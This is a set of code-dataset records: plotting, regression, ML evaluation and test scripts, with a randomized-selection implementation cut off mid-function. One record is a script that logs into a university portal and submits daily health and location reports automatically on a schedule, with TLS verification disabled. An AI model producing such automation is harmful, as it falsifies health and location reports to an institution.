self.hamiltonian.h.T, self.nconts, norm=self.hnorm)\n \n \n self.n [0:-1] = self.distribution.density\n self.n [ -1] = self.distribution.density[0]\n self.phi[0:-1] = self.potential.phi\n self.phi[ -1] = self.potential.phi[0]\n \n self.lines[\"n\"].set_ydata(self.n)\n self.axes [\"n\"].relim()\n self.axes [\"n\"].autoscale_view()\n \n self.lines[\"p\"].set_ydata(self.phi)\n self.axes [\"p\"].relim()\n self.axes [\"p\"].autoscale_view()\n \n \n if self.vMax > 0.0:\n self.axes[\"f\"].set_ylim((-self.vMax, +self.vMax)) \n \n \n tStart, tEnd, xStart, xEnd = self.get_timerange()\n \n# self.lines[\"T\"].set_xdata(self.grid.t[tStart:tEnd])\n# self.lines[\"T\"].set_ydata(self.ekin[tStart:tEnd])\n# 
self.axes [\"T\"].relim()\n# self.axes [\"T\"].autoscale_view()\n# self.axes [\"T\"].set_xlim((xStart,xEnd)) \n# \n# self.lines[\"V\"].set_xdata(self.grid.t[tStart:tEnd])\n# self.lines[\"V\"].set_ydata(self.epot[tStart:tEnd])\n# self.axes [\"V\"].relim()\n# self.axes [\"V\"].autoscale_view()\n# self.axes [\"V\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"N\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"N\"].set_ydata(self.partnum[tStart:tEnd])\n self.axes [\"N\"].relim()\n self.axes [\"N\"].autoscale_view()\n self.axes [\"N\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"P\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"P\"].set_ydata(self.momentum[tStart:tEnd])\n self.axes [\"P\"].relim()\n self.axes [\"P\"].autoscale_view()\n self.axes [\"P\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"E\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"E\"].set_ydata(self.energy[tStart:tEnd])\n self.axes [\"E\"].relim()\n self.axes [\"E\"].autoscale_view()\n self.axes [\"E\"].set_xlim((xStart,xEnd)) \n \n self.lines[\"L\"].set_xdata(self.grid.t[tStart:tEnd])\n self.lines[\"L\"].set_ydata(self.enstrophy[tStart:tEnd])\n self.axes [\"L\"].relim()\n self.axes [\"L\"].autoscale_view()\n self.axes [\"L\"].set_xlim((xStart,xEnd)) \n \n \n plt.draw()\n plt.show(block=final)\n \n return self.figure\n \n \n def add_timepoint(self):\n# E = self.hamiltonian.E_kin + self.hamiltonian.E_pot + self.potential.E\n# E0 = self.hamiltonian.E_kin0 + self.hamiltonian.E_pot0 + self.potential.E0\n \n E0 = self.hamiltonian.E0\n E = self.hamiltonian.E\n \n if np.abs(self.hamiltonian.P0) < 1E-3: \n self.momentum[self.iTime] = self.hamiltonian.P\n else:\n self.momentum[self.iTime] = self.hamiltonian.P_error\n \n self.energy [self.iTime] = (E - E0) / E0\n self.partnum [self.iTime] = self.distribution.N_error\n self.enstrophy[self.iTime] = self.distribution.L2_error\n self.entropy [self.iTime] = self.distribution.S_error\n \n self.title.set_text('t = %1.2f' % (self.grid.t[self.iTime]))\n \n self.iTime += 1\n \n \n def get_timerange(self):\n tStart = self.iTime - (self.nTime+1)\n tEnd = self.iTime\n \n if tStart < self.iStart:\n tStart = self.iStart\n \n xStart = self.grid.t[tStart]\n xEnd = self.grid.t[tStart+self.nTime]\n \n return tStart, tEnd, xStart, xEnd\n \n","sub_path":"vlasov/plot/plot_replay.py","file_name":"plot_replay.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"316129027","text":"import random\n\nprint (\"Please enter a number: \")\nnumber = input()\nnumber = int(number)\nprint(\"Your number is: \" + str(number))\n\ndef roll(number):\n result = random.randint(1, number)\n print(\"Below is a randomly selected number between 1 and \" + str(number))\n print(result)\n\n\n\nroll(number)\n\n","sub_path":"IntroToPython/RandomNumber/CustomRandomFunction.py","file_name":"CustomRandomFunction.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260155510","text":"# -*- coding:UTF-8 -*-\n__author__ = \"KenLee\"\n__email__ = \"hellokenlee@163.com\"\n\nimport os\nimport sys\nimport time\nimport math\n\nPROJECT_DIR = os.path.abspath(\"../../../Project/\")\nPROJECT_BUILD_DIR = os.path.join(os.path.join(PROJECT_DIR, \"x64\"), \"DebugGL\")\nsys.path.append(PROJECT_BUILD_DIR)\n\nimport nene\n\nfrom nene import Vec3\nfrom nene import Utils\nfrom nene import Model\nfrom nene import Shader\nfrom nene import Camera\nfrom nene 
import Keyboard\nfrom nene import Geometry\nfrom nene import CoordinateAxes\nfrom nene import CameraController\nfrom nene import NeneConstantBuffer\nfrom nene import ConstantBufferPool\n\n\ndef mycallback(eve):\n\tif eve.code == int(nene.EventCode.ON_KEY_PRESS):\n\t\tif eve.key == int(nene.Key.ESCAPE):\n\t\t\tUtils.set_window_should_close(True)\n\t\tpass\n\n\ndef main():\n\t#\n\tUtils.init(\"Nene Python\", 800, 600)\n\tUtils.clear_color(0.1, 0.1, 0.1)\n\t#\n\tKeyboard.instance().on_press.add_callback(mycallback)\n\t#\n\tcbp = ConstantBufferPool()\n\tcc = CameraController()\n\tca = CoordinateAxes(100.0, 10.0)\n\t#\n\tquad = Geometry.create_quad(nene.COUNTER_CLOCK_WISE)\n\tshader0 = Shader(\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Screen.vert\"),\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Screen.frag\"),\n\t\tnene.VertexFormat.POSITION_NORMAL_TEXTURE, True\n\t)\n\tshader1 = Shader(\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Common.vert\"),\n\t\tos.path.join(PROJECT_DIR, \"Resource/Shader/GLSL/Common.frag\"),\n\t\tnene.VertexFormat.POSITION_NORMAL_TEXTURE, True\n\t)\n\t#\n\thouse = Model(os.path.join(PROJECT_DIR, \"Resource/Mesh/house/house.obj\"))\n\t#\n\thouse.scale_to(0.001)\n\t#\n\thouse.move_to(Vec3(1.0, 1.0, 1.0))\n\t#\n\twhile not Utils.window_should_close():\n\t\t#\n\t\tUtils.update()\n\t\tUtils.clear()\n\t\t#\n\t\tcc.update()\n\t\tcc.get_camera().use()\n\t\t#\n\t\tNeneConstantBuffer.instance().per_frame.update(0)\n\t\t#\n\t\tca.draw()\n\t\t#\n\t\thouse.draw(shader1)\n\t\t#\n\t\tUtils.swap_buffers()\n\t#\n\tUtils.terminate()\n\t#\n\tos._exit(0)\n\tpass\n\nif __name__ == '__main__':\n\tmain()\n\tpass\n","sub_path":"Source/NeneSample/Python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"37546666","text":"import matplotlib.pyplot as plt\r\nimport random\r\n\r\n\r\nclass Barcode(object):\r\n\r\n \"\"\"plot a DNA sequence.\"\"\"\r\n\r\n def __init__(self, seq):\r\n self.seq = seq\r\n self.length = len(seq)\r\n\r\n def plot_barcode(self):\r\n fig = plt.figure(dpi=90, facecolor='white')\r\n\r\n plt.axis('off')\r\n\r\n x0 = 0.1\r\n y0 = 7\r\n for index, value in enumerate(self.seq):\r\n x1 = [x0, x0]\r\n y1 = [y0, y0+1]\r\n y2 = [y0+1, y0+1.1]\r\n if value == 'A':\r\n plt.plot(x1, y1, linewidth=2.0, color='green')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='green')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'C':\r\n plt.plot(x1, y1, linewidth=2.0, color='blue')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='blue')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'G':\r\n plt.plot(x1, y1, linewidth=2.0, color='black')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='black')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n if value == 'T':\r\n plt.plot(x1, y1, linewidth=2.0, color='red')\r\n if (index+1) % 10 == 0:\r\n plt.plot(x1, y2, linewidth=0.5, color='red')\r\n plt.text(x0, y0+1.05, '{}'.format(index+1), size=6)\r\n\r\n x0 += 0.0005\r\n\r\n plt.show()\r\n\r\n\r\ntext = list(\r\n 'CTTCGACGGACGCACGGCTAGTGGTGGTTTTCAAGGCCTTCGTATCGAGCTGTGCATACGCGAGGACCG')\r\n\r\nif __name__ == '__main__':\r\n import plot_barcode\r\n seq = Barcode(text)\r\n 
seq.plot_barcode()\r\n","sub_path":"plot_barcode.py","file_name":"plot_barcode.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575909414","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport statsmodels.api as st\nimport collections\n\n#Load Data with pandas, and parse the first column into datetime\ntrain = pd.read_csv('data/train.csv', parse_dates=[0])\ntest = pd.read_csv('data/test.csv', parse_dates=[0])\n\n#print train.head()\n\n#Feature engineering\ntemp_train = pd.DatetimeIndex(train['datetime'])\ntrain['year'] = temp_train.year\ntrain['month'] = temp_train.month\ntrain['hour'] = temp_train.hour\ntrain['weekday'] = temp_train.weekday\n\ntemp_test = pd.DatetimeIndex(test['datetime'])\ntest['year'] = temp_test.year\ntest['month'] = temp_test.month\ntest['hour'] = temp_test.hour\ntest['weekday'] = temp_test.weekday\n\n#Define features vector\nfeatures = ['season', 'holiday', 'workingday', 'weather',\n 'temp', 'atemp', 'humidity', 'windspeed', 'year',\n 'month', 'weekday', 'hour']\n\n# plt.figure()\n# plt.hist(train['casual'].values, histtype='bar')\n# plt.show()\n#\n# import scipy.stats as stats\n# plt.figure()\n# graph = stats.probplot(train['atemp'], dist=\"norm\", plot=plt)\n# plt.show()\n#\n#\n# sm = pd.scatter_matrix(train, alpha=0.05, figsize=(10,10), diagonal='hist')\n#\n# [s.xaxis.label.set_rotation(45) for s in sm.reshape(-1)]\n# [s.yaxis.label.set_rotation(0) for s in sm.reshape(-1)]\n#\n# #May need to offset label when rotating to prevent overlap of figure\n# [s.get_yaxis().set_label_coords(-0.3,0.5) for s in sm.reshape(-1)]\n#\n# #Hide all ticks\n# [s.set_xticks(()) for s in sm.reshape(-1)]\n# [s.set_yticks(()) for s in sm.reshape(-1)]\n#\n# plt.show()\n\n# #y ticklabels\n# [plt.setp(item.yaxis.get_majorticklabels(), 'size', 5) for item in fig.ravel()]\n# #x ticklabels\n# [plt.setp(item.xaxis.get_majorticklabels(), 'size', 5) for item in fig.ravel()]\n# #y labels\n# [plt.setp(item.yaxis.get_label(), 'size', 9) for item in fig.ravel()]\n# #x labels\n# [plt.setp(item.xaxis.get_label(), 'size', 9) for item in fig.ravel()]\n#\n# plt.show()\n\n# fig, axes = plt.subplots(nrows=2)\n#\n# counts = collections.Counter(train['season'].values)\n# axes[0].bar(counts.keys(), counts.values(), color='red',align='center')\n# axes[0].set(title='Season')\n# axes[0].set_xticks(counts.keys())\n#\n# counts = collections.Counter(train['workingday'].values)\n# axes[1].bar(counts.keys(), counts.values(), color='red',align='center')\n# axes[1].set(title='Working day')\n# axes[1].set_xticks(counts.keys())\n#\n# plt.show()\n\n#axes[1].bar(train['workingday'].values, color='red')\n#axes[1].set(title='Registered')\n#plt.show()\n\n#The evaluation metric is the RMSE in the log domain,\n#so we should transform the target columns into log domain as well.\nfor col in ['casual', 'registered', 'count']:\n train['log-' + col] = train[col].apply(lambda x: np.log1p(x))\n\n#Split train data set into training and validation sets\n#np.random.shuffle(train.values)\ntraining, validation = train[:int(0.95*len(train))], train[int(0.95*len(train)):]\n\n# Create a linear model\nX = st.add_constant(training[features])\n\nmodel = st.OLS(training['log-count'],X) # OLS stands for Ordinary Least Squares\nf = model.fit()\n\nvalidnew=validation[features]\nvalidnew.insert(0, 'const', 1)\n\nypred = f.predict(validnew)\nprint(np.expm1(ypred))\n\nfig, ax = 
plt.subplots()\nplt.plot(validnew['atemp'], np.expm1(ypred), 'o', validation['atemp'], np.expm1(validation['log-count']), 'ro');\nax.set_title('blue: true, red: OLS')\nax.set_xlabel('atemp')\nax.set_ylabel('count')\nplt.show()\n\ntestnew=test[features]\ntestnew.insert(0, 'const', 1)\n\nypredtest = f.predict(testnew)\n\nresult = [round(np.expm1(x)) for x in ypredtest]\n\ndf=pd.DataFrame({'datetime':test['datetime'], 'count':result})\ndf.to_csv('output/linearregression_output.csv', index = False, columns=['datetime','count'])","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378467912","text":"# prediction using the segmentor-classifier for ACs\nimport os\nimport pickle\nimport sys\nfrom argparse import ArgumentParser\n\nimport torch\n\nfrom src.ac_tagging import post_process\nfrom src.models import BiLSTM_Segmentor_Classifier, BiLSTM_Segmentor_Classifier_no_pos\nfrom src.utils import HyperParams, mode_dict\n\n\ndef main(mode, config_file_path, trained_model_path):\n # train the segmentor-classifier first\n h_params = HyperParams(config_file_path)\n from src.utils.preprocess import get_train_test_split\n from src.utils.preprocess import prepare_data\n\n torch.manual_seed(h_params.rand_seed)\n _, test_files = get_train_test_split(os.path.abspath(os.path.join(\"..\", \"data\", \"train-test-split.csv\")))\n test_data, ept_offsets = prepare_data(mode, test_files)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n SegmentorClassifier = BiLSTM_Segmentor_Classifier if h_params.use_pos else BiLSTM_Segmentor_Classifier_no_pos\n model = SegmentorClassifier(h_params.d_word_embd, h_params.d_pos_embd, h_params.d_h1,\n h_params.n_lstm_layers, h_params.word_voc_size, h_params.pos_voc_size,\n h_params.ac_tagset_size, h_params.batch_size, device,\n h_params.pretraind_embd_layer_path)\n # load trained model state-dict\n checkpoint = torch.load(trained_model_path)\n model.load_state_dict(checkpoint['model_state_dict'])\n ## set CUDA if available\n if torch.cuda.is_available():\n model.cuda()\n # set evaluation mode mode\n model.eval()\n # inference for all chosen data\n preds = []\n with torch.no_grad():\n for (indexed_tokens, indexed_POSs, indexed_AC_tags) in test_data:\n tag_scores = model((indexed_tokens.to(device),indexed_POSs.to(device))) # get log soft max for input\n preds.append(torch.argmax(tag_scores, dim=1).tolist())\n # post-process for fine tuning\n ac_tag2ix = pickle.load(open(os.path.join(h_params.vocab_dir,\"ac_tag2ix.pcl\"),'rb'))\n corrected_tags = post_process(preds, ac_tag2ix)\n # save results\n results_file = os.path.join(h_params.exps_dir,os.path.split(trained_model_path)[-1][:-3]+\".results\")\n\n true_tags = [ac_tags.tolist() for _,_,ac_tags in test_data]\n with open(results_file,'wt') as f:\n # write header for file\n f.write(\"\\t\".join((\"# essay_paragraph_token_index\",\"true AC-tag\",\"predicted AC-tag\",\"post processed AC tag\"))+'\\n')\n # iterate over results (by appropriate devision)\n for i_seq in range(len(preds)):\n for i_tok in range(len(preds[i_seq])):\n e_p_t_index = ept_offsets[i_seq][i_tok]\n true_tag = true_tags[i_seq][i_tok]\n predicted_ac_tag = preds[i_seq][i_tok]\n post_processed_tag = corrected_tags[i_seq][i_tok]\n f.write(\"\\t\".join((str(e_p_t_index),str(true_tag),str(predicted_ac_tag),str(post_processed_tag))))\n f.write('\\n')\n\n sys.stdout.write(\"finished 
predictions and saved to {}\".format(os.path.abspath(results_file)))\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument('-m', '--mode', default='s', choices=['s', 'p', 'e'], help=\"\"\"context learning mode:\n - 's' - sentence\"\n - 'p' - paragraph\"\n - 'e' - essay\"\"\")\n\n parser.add_argument('-cp', '--config_path', default=os.path.abspath(os.path.join(\"..\", \"params.conf\")),\n help=\" path to learning parameters file\")\n\n parser.add_argument('-mp', '--model_path', required=True, help=\" path to trained model\")\n args = parser.parse_args(sys.argv[1:])\n mode = mode_dict[args.mode]\n main(mode, os.path.abspath(args.config_path), os.path.abspath(args.model_path))","sub_path":"src/ac_tagging/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"397086126","text":"import os\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom autokeras import keras_layers as layer_module\n\n\ndef get_data():\n train = np.array([['a', 'ab', 2.1], ['b', 'bc', 1.0], ['a', 'bc', 'nan']])\n test = np.array([['a', 'ab', 2.1], ['x', 'bc', 1.0], ['a', 'bc', 'nan']])\n y = np.random.rand(3, 1)\n return train, test, y\n\n\ndef test_multi_column_categorical_encoding(tmp_path):\n x_train, x_test, y_train = get_data()\n input_node = tf.keras.Input(shape=(3,), dtype=tf.string)\n layer = layer_module.MultiColumnCategoricalEncoding([\n layer_module.INT,\n layer_module.INT,\n layer_module.NONE,\n ])\n hidden_node = layer(input_node)\n output_node = tf.keras.layers.Dense(1, activation='sigmoid')(hidden_node)\n model = tf.keras.Model(input_node, output_node)\n model.compile(loss='binary_crossentropy', optimizer='adam')\n tf.data.Dataset.zip((\n (tf.data.Dataset.from_tensor_slices(x_train).batch(32),),\n (tf.data.Dataset.from_tensor_slices(np.random.rand(3, 1)).batch(32),),\n ))\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n\n model.fit(x_train, y_train, epochs=1)\n\n model2 = tf.keras.Model(input_node, hidden_node)\n result = model2.predict(x_train)\n assert result[0][0] == result[2][0]\n assert result[0][0] != result[1][0]\n assert result[0][1] != result[1][1]\n assert result[0][1] != result[2][1]\n assert result[2][2] == 0\n\n output = model2.predict(x_test)\n assert output.dtype == np.dtype('float32')\n\n\ndef build_model():\n input_node = tf.keras.Input(shape=(3,), dtype=tf.string)\n layer = layer_module.MultiColumnCategoricalEncoding(encoding=[\n layer_module.INT, layer_module.INT, layer_module.NONE])\n output_node = layer(input_node)\n output_node = tf.keras.layers.Dense(1)(output_node)\n return tf.keras.Model(input_node, output_node), layer\n\n\ndef test_model_save(tmp_path):\n x_train, x_test, y_train = get_data()\n model, layer = build_model()\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n model.compile(optimizer='adam', loss='mse')\n model.fit(x_train, y_train, epochs=1, verbose=False)\n\n model.save(os.path.join(tmp_path, 'model'))\n model2 = tf.keras.models.load_model(os.path.join(tmp_path, 'model'),\n custom_objects=layer_module.CUSTOM_OBJECTS)\n\n assert np.array_equal(model.predict(x_train), model2.predict(x_train))\n\n\ndef test_weight_save(tmp_path):\n x_train, x_test, y_train = get_data()\n model, layer = build_model()\n layer.adapt(tf.data.Dataset.from_tensor_slices(x_train).batch(32))\n model.compile(optimizer='adam', loss='mse')\n model.fit(x_train, y_train, epochs=1, verbose=False)\n 
model.save_weights(os.path.join(tmp_path, 'checkpoint'))\n\n    model2, _ = build_model()\n    model2.load_weights(os.path.join(tmp_path, 'checkpoint'))\n\n    assert np.array_equal(model.predict(x_train), model2.predict(x_train))\n","sub_path":"tests/autokeras/keras_layers_test.py","file_name":"keras_layers_test.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38841619","text":"# author: ZhaoKun\n# contact: 1161678627@qq.com\n# datetime: 2021-02-26 20:56\n# software: PyCharm\n\nimport requests\nrequests.packages.urllib3.disable_warnings()\nimport time\nimport schedule\n\ndef GetNowTime():\n    date = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n    date = date[:-3]\n    # append the Chinese time-unit characters 日 (day), 时 (hour) and 分 (minute)\n    date = date.replace(' ', '日').replace(':', '时') + '分'\n    return date\n\n# log in to the account\ndef login_account(account_data):\n    session = requests.session()\n    url = 'https://xxcapp.xidian.edu.cn/uc/wap/login/check'\n    session.headers = {\n        'Host': 'xxcapp.xidian.edu.cn',\n        'Origin': 'https://xxcapp.xidian.edu.cn',\n        'Referer': 'https://xxcapp.xidian.edu.cn/uc/wap/login?redirect=https%3A%2F%2Fxxcapp.xidian.edu.cn%2Fsite%2Fncov%2Fxidiandailyup',\n        'sec-ch-ua': '\"GoogleChrome\";v=\"87\",\"Not;ABrand\";v=\"99\",\"Chromium\";v=\"87\"',\n        'sec-ch-ua-mobile': '?0',\n        'Sec-Fetch-Dest': 'empty',\n        'Sec-Fetch-Mode': 'cors',\n        'Sec-Fetch-Site': 'same-origin',\n        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/87.0.4280.141Safari/537.36',\n        'X-Requested-With': 'XMLHttpRequest'\n    }\n    data = account_data\n    response = session.post(url=url, data=data, verify=False)\n    # '操作成功' ('operation successful') is what the server returns on success\n    if '操作成功' not in response.content.decode():\n        # if the login failed, wait a moment and then log in again\n        print(f'Time: {GetNowTime()} user {str(data)} failed to log in, trying again!')\n        time.sleep(60)\n        session = login_account(account_data)\n    else:\n        print(f'Time: {GetNowTime()} user {str(data)} logged in successfully!')\n    # session.close()\n    # print(response.json())\n    return session\n\n# submit the report data\ndef submit_data(session):\n    url = 'https://xxcapp.xidian.edu.cn/xisuncov/wap/open-report/save'\n    data = {\n        'sfzx':'1',\n        'tw':'1',\n        'address': '陕西省西安市雁塔区电子城街道科技大道南段西安电子科技大学北校区',\n        'geo_api_info': '{\"type\":\"complete\",\"info\":\"SUCCESS\",\"status\":1,\"cEa\":\"jsonp_428024_\",\"position\":{\"Q\":34.23239,\"R\":108.91516000000001,\"lng\":108.91516,\"lat\":34.23239},\"message\":\"GetipLocationsuccess.Getaddresssuccess.\",\"location_type\":\"ip\",\"accuracy\":null,\"isConverted\":true,\"addressComponent\":{\"citycode\":\"029\",\"adcode\":\"610113\",\"businessAreas\":[],\"neighborhoodType\":\"\",\"neighborhood\":\"\",\"building\":\"\",\"buildingType\":\"\",\"street\":\"白沙路\",\"streetNumber\":\"附8号\",\"country\":\"中国\",\"province\":\"陕西省\",\"city\":\"西安市\",\"district\":\"雁塔区\",\"township\":\"电子城街道\"},\"formattedAddress\":\"陕西省西安市雁塔区电子城街道科技大道南段西安电子科技大学北校区\",\"roads\":[],\"crosses\":[],\"pois\":[]}',\n        'area': '陕西省西安市雁塔区',\n        'province': '陕西省',\n        'city': '西安市',\n        'sfcyglq':'0',\n        'sfyzz':'0',\n        'qtqk':'',\n        'ymtys':'0'\n    }\n    response = session.post(url=url, data=data, verify=False)\n    print(response.text)\n    session.close()\n    return response.text\n\n# entry point: log in and submit the report\ndef run(account):\n    session = login_account(account)\n    submit_data(session)\n\ndef test():\n    print('Program is running normally!')\n\nif __name__ == '__main__':\n    # run(account=account_data)\n    # set up the scheduled tasks\n    account_data = {\n        'username': '',\n        'password': ''\n    }\n    # daily report submission times (morning/noon/evening)\n    chen_submit_time = \"06:01\"\n    wu_submit_time = \"12:11\"\n    wan_submit_time = \"18:41\"\n    schedule.every().day.at(chen_submit_time).do(run, account_data)\n    
schedule.every().day.at(wu_submit_time).do(run, account_data)\n    schedule.every().day.at(wan_submit_time).do(run, account_data)\n    schedule.every(5).hours.do(test)\n    print('Program is running normally!')\n    while True:\n        # run all tasks that are due, then sleep briefly to avoid a busy loop\n        schedule.run_pending()\n        time.sleep(1)","sub_path":"chenwujian_every_day.py","file_name":"chenwujian_every_day.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120548766","text":"# camera-ready\n\nfrom datasets import ToyDatasetEvalKL # (this needs to be imported before torch, because cv2 needs to be imported before torch for some reason)\nfrom model import ToyNet\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nimport numpy as np\nimport pickle\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport cv2\n\nbatch_size = 32\n\nnum_samples = 2048\n\nmodel_id = \"2-kldis\"\nepoch = 75\nnum_models = 20\n\nepsilon = 1.0e-30\n\nwith open(\"/root/ebms_regression/1dregression/2/gt_x_values_2_scores.pkl\", \"rb\") as file: # (needed for python3)\n    gt_x_values_2_scores = pickle.load(file)\n\nval_dataset = ToyDatasetEvalKL()\n\nnum_val_batches = int(len(val_dataset)/batch_size)\nprint (\"num_val_batches:\", num_val_batches)\n\nval_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=batch_size, shuffle=False)\n\ntorch.autograd.set_grad_enabled(False)\n\nKL_values = []\nfor model_i in range(num_models):\n    network = ToyNet(model_id, project_dir=\"/root/ebms_regression/1dregression\").cuda()\n\n    network.load_state_dict(torch.load(\"/root/ebms_regression/1dregression/training_logs/model_%s_%d/checkpoints/model_%s_epoch_%d.pth\" % (model_id, model_i, model_id, epoch)))\n\n    x_values = []\n    x_values_2_scores = {}\n    network.eval() # (set in eval mode, this affects BatchNorm and dropout)\n    for step, (x) in enumerate(val_loader):\n        x = x.cuda().unsqueeze(1) # (shape: (batch_size, 1))\n\n        y_samples = np.linspace(-3.0, 3.0, num_samples) # (shape: (num_samples, ))\n        y_samples = y_samples.astype(np.float32)\n        y_samples = torch.from_numpy(y_samples).cuda() # (shape: (batch_size, num_samples))\n\n        x_features = network.feature_net(x)\n        scores = network.predictor_net(x_features, y_samples.expand(x.shape[0], -1)) # (shape: (batch_size, num_samples))\n\n        x_values.extend(x.squeeze(1).cpu().tolist())\n\n        for i, x_val in enumerate(x):\n            x_values_2_scores[x_val.item()] = scores[i,:].cpu().numpy()\n\n    print (\"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\")\n\n    num_x_values = float(len(x_values))\n    print (num_x_values)\n\n    KL = 0.0\n    for step, x_value in enumerate(x_values):\n        scores = np.exp(x_values_2_scores[x_value].flatten()) # (shape: (num_samples, ))\n        if np.sum(scores) > 1e-40:\n            prob = scores/np.sum(scores) # (shape: (num_samples, ))\n        else:\n            scores = np.ones((num_samples, ))\n            prob = scores/np.sum(scores)\n\n        scores_gt = gt_x_values_2_scores[x_value].flatten() + epsilon # (shape: (num_samples, ))\n        prob_gt = scores_gt/np.sum(scores_gt) # (shape: (num_samples, ))\n\n        KL_i = np.sum(prob_gt*np.log(prob_gt/prob))\n        KL = KL + KL_i/num_x_values\n\n    print (\"KL: %g\" % KL)\n    KL_values.append(KL)\n\n    print (KL_values)\n    print (\"KL: %g +/- %g\" % (np.mean(np.array(KL_values)), np.std(np.array(KL_values))))\n    KL_values.sort()\n    print (KL_values[0:5])\n    print (\"KL top 5: %g +/- %g\" % (np.mean(np.array(KL_values[0:5])), np.std(np.array(KL_values[0:5]))))\n\n    print (KL_values[0:10])\n    print (\"KL top 10: %g +/- 
%g\" % (np.mean(np.array(KL_values[0:10])), np.std(np.array(KL_values[0:10]))))\n\n print (\"##################################################################\")\n","sub_path":"1dregression/2/kldis_eval.py","file_name":"kldis_eval.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35836058","text":"import _plotly_utils.basevalidators\n\n\nclass LocationmodeValidator(_plotly_utils.basevalidators.EnumeratedValidator):\n\n def __init__(\n self, plotly_name='locationmode', parent_name='scattergeo', **kwargs\n ):\n super(LocationmodeValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type='calc',\n role='info',\n values=['ISO-3', 'USA-states', 'country names'],\n **kwargs\n )\n","sub_path":"plotly/validators/scattergeo/_locationmode.py","file_name":"_locationmode.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"600853427","text":"\"\"\"Utility functions for `neurodocker.interfaces.tests`.\"\"\"\nfrom __future__ import absolute_import\n\nfrom neurodocker import Dockerfile, SpecsParser\nfrom neurodocker.docker import client, DockerContainer, DockerImage\n\ndef get_container_from_specs(specs, **kwargs):\n \"\"\"Return started container. `kwargs` are for `container.start()`.\"\"\"\n parser = SpecsParser(specs)\n df = Dockerfile(parser.specs)\n image = DockerImage(df).build(log_console=True)\n return DockerContainer(image).start(**kwargs)\n\ndef test_cleanup(container):\n container.cleanup()\n client.containers.prune()\n client.images.prune()\n","sub_path":"neurodocker/interfaces/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333460175","text":"\n\"\"\"Randomized Selection Implementation\"\"\"\n\nfrom random import randint\n\n\ndef rselect(array, i):\n \"\"\"Rselect public method\"\"\"\n return _rselect(array, 0, len(array) - 1, i)\n\n\ndef _rselect(array, l, r, i):\n \"\"\"Divide and conquer step\"\"\"\n\n if l >= r:\n return array[r]\n\n pivot_index = partition(array, l, r)\n\n if pivot_index == i:\n return array[i]\n elif pivot_index > i:\n return _rselect(array, l, pivot_index - 1, i)\n else:\n return _rselect(array, pivot_index + 1, r, i)\n\n\ndef partition(array, l, r):\n \"\"\"Partition around pivot\"\"\"\n pivot_index = choose_pivot(array, l, r)\n pivot = array[pivot_index]\n\n i = l + 1\n j = l + 1\n while j <= r:\n if array[j] < pivot:\n swap(array, i, j)\n i += 1\n\n j += 1\n\n swap(array, l, i - 1)\n\n return i - 1\n\n\ndef choose_pivot(array, l, r):\n \"\"\"Choose pivot\"\"\"\n\n # Choose random pivot\n pivot_index = randint(l, r)\n\n # Make sure chosen pivot is on first slot (relative)\n swap(array, l, 